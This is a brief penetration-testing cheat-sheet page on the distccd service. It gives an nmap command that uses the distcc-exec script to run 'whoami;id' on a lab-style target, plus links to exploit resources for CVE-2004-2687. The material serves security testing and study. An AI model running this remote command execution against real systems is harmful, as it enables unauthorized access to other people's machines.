> For the complete documentation index, see [llms.txt](https://kashz.gitbook.io/kashz-jewels/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kashz.gitbook.io/kashz-jewels/services/distccd-distcc-daemon.md).

# distccd (DistCC Daemon)

## Recon

```
nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='whoami;id'" -Pn
```

## distccd v1 (DistCC Daemon v1)

```
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
```
